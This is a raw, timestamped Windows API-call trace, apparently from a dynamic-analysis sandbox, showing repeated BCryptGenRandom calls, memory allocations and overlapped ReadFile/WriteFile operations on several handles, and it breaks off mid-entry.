LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0081.216] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.216] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.216] free (_Block=0x77d800) [0081.216] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.216] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.216] free (_Block=0x1ff1930) [0081.216] free (_Block=0x1ff1a40) [0081.216] free (_Block=0x77d908) [0081.216] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.217] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.233] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.233] CloseHandle (hObject=0x3c4) returned 1 [0081.240] free (_Block=0x1fb18c0) [0081.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0081.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0081.251] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.251] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.251] free (_Block=0x77d800) [0081.251] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.251] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.251] free (_Block=0x1ff1930) [0081.251] free (_Block=0x1ff1a40) [0081.251] free (_Block=0x77d908) [0081.251] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.252] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.253] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.276] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.276] CloseHandle (hObject=0x3c4) returned 1 [0081.280] free (_Block=0x1fb18c0) [0081.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0081.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0081.291] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.291] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.291] free (_Block=0x77d800) [0081.291] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.291] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.291] free (_Block=0x1ff1930) [0081.291] free (_Block=0x1ff1a40) [0081.291] free (_Block=0x77d908) [0081.291] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.292] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.292] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.793] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc32, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.793] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.794] CloseHandle (hObject=0x3c4) returned 1 [0081.798] free (_Block=0x1ff1e60) [0081.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.809] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0081.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0081.811] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.811] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.811] free (_Block=0x77d800) [0081.811] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.811] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.811] free (_Block=0x1ff1930) [0081.811] free (_Block=0x1ff1a40) [0081.811] free (_Block=0x77d908) [0081.812] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.812] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.831] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8c12, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.834] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.835] CloseHandle (hObject=0x3c4) returned 1 [0081.837] free (_Block=0x1ff1e60) [0081.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.887] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb08f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.889] CloseHandle (hObject=0x3b4) returned 1 [0081.889] free (_Block=0x1fb18c0) [0081.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.920] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x2f993, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.940] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x280e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0081.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.988] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2808, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0082.012] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.023] CloseHandle (hObject=0x3bc) returned 1 [0082.023] free (_Block=0x2031ed0) [0082.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.036] WriteFile (in: hFile=0x3b8, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x6bc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0082.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.044] CloseHandle (hObject=0x3b4) returned 1 [0082.045] free (_Block=0x1fb18c0) [0082.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.045] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2a90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.101] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1a7ed, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.104] CloseHandle (hObject=0x3bc) returned 1 [0082.108] free (_Block=0x3d70048) [0082.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.131] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0082.131] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0082.131] free (_Block=0x1ff1e60) [0082.131] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0082.131] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0082.132] free (_Block=0x1ff1e60) [0082.132] free (_Block=0x1ff1930) [0082.132] free (_Block=0x77d800) [0082.132] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.145] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.146] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.146] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.146] free (_Block=0x77d800) [0082.146] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.146] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.147] free (_Block=0x1ff1930) [0082.147] free (_Block=0x1ff1a40) [0082.147] free (_Block=0x77d908) [0082.147] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.281] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.281] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.281] free (_Block=0x77d800) [0082.281] calloc (_Count=0x41, _Size=0x4) returned 0x3d70048 [0082.281] calloc (_Count=0x82, _Size=0x4) returned 0x3d70158 [0082.281] free (_Block=0x3d70048) [0082.281] free (_Block=0x3d70158) [0082.281] free (_Block=0x77d908) [0082.281] WriteFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.284] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.293] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.293] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.293] free (_Block=0x77d800) [0082.293] calloc (_Count=0x41, _Size=0x4) returned 0x3d70048 [0082.293] calloc (_Count=0x82, _Size=0x4) returned 0x3d70158 [0082.294] free (_Block=0x3d70048) [0082.294] free (_Block=0x3d70158) [0082.294] free (_Block=0x77d908) [0082.294] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0082.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0082.314] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.315] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.315] free (_Block=0x77d800) [0082.315] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.315] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.315] free (_Block=0x1ff1930) [0082.315] free (_Block=0x1ff1a40) [0082.315] free (_Block=0x77d908) [0082.315] WriteFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.329] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.329] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0082.338] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, 